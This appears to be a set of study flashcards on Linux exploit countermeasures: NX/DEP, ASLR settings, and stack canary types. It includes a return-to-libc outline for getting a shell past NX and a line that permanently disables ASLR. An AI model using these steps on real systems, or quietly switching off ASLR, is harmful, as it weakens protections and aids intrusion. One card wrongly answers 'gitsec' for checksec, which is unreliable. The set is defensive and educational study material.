Linux Exploit Countermeasures & Bypasses Flashcards
(35 cards)
This tool can be used to examine an executable and display what mitigation it uses.
gitsec
https://github.com/slimm609/checksec.sh
This tool/script can be use to examine an executable and display what exploit mitigation it uses
checksec
https://github.com/slimm609/checksec.sh
This is the most popular countermeasures that can be found in most modern software pieces. The idea is that data on the stack is not executable. Often referred as DEP - Data Execution Prevention
No eXecute
If AMD make use of the No eXecute (NX) bit. What does Intel uses?
Execute Disable Bit (XD) both 32/64 arch
If you try to execute any data that lies on the stack, for example after moving the execution flow back to the stack after buffer overflow, the program will crash with a??
SIGSEGV
True / False
NX disallows the execution of data on the stack but having the function argument on the stack is perfectly fine
True
This command can be use to check if the target binary uses the Libc( standard C library in linux)
ldd
Using this command you can issue all functions provided by your system’s libc.
nm -D /lib/$(uname -m)-linux-gnu/libc-*.so | grep -vw U | grep -v “_” | cut -d “ “ -f3
Using this command you can issue all functions provided by your system’s libc.
nm -D /lib/$(uname -m)-linux-gnu/libc-*.so | grep -vw U | grep -v “_” | cut -d “ “ -f3
This is the distance between the library’s base address and the target function address
offset
In order to execute a function that is in libc, we needed to do this 3 step (specified on XDS)
- Find an interesting function that will provide us with a shell
- Set up the stack properly
- Overwrite the EIP with the abovementioned function’s address
This is an exploit countermeasure introduced on the Operating System Level. When ASLR is turned on, upon launching a new process, its core memory areas will be loaded at different address each time.
ASLR (Address Space Layout Randomization)
What file is the ASLR setting is held.
randomize_va_space
/proc/sys/kernel/randomize_va_space
If the value of ASLR is 0, what does it means?
It means that ASLR if OFF
If the value of ASLR is 1, what does it mean?
It means that the ASLR is ON and the stack, virtual dynamic shared object page, shared memory regions are randomized
If the value of ASLR is 2, what does it mean?
ASLR is ON and in addition to 1, the data segments are randomize too.
To permanently set the value of ASLR which file and value you needed to append on it.
/etc/sysctl.conf
kernel.randomize_va_space=0
This is another exploit mitigation that is employed on Linux systems. This is also known as stack canary, stack protector, stack guard or SSP
Stack Cookie
This is a 4-byte value that is pushed onto the stack when a function is entered.
Stack Canary
When the function ends its task, and the stack frame is cleared, the stack cookie value is checked against the previously pushed value. If it’s different, the program is terminated by calling this function. What is this function?
__stack_chk_fail function
This one is a type of stack cookie. It is a 4-byte value generated by e.g. /dev/random
Random Canary
This one is a type of stack cookie. The random canary is additionally XOR’ed with stored control data
Random XOR Canary
This one is a type of stack cookie. The canary has value of 0x00000000; supposedly, it will be impossible to deliver zeroes to the stack as it’s a null terminator string
Null Canary
This one is a type of stack cookie. The canary is set to a combination of string terminators like 0x00, 0xff, 0x0a and 0x0d
Terminator Canary
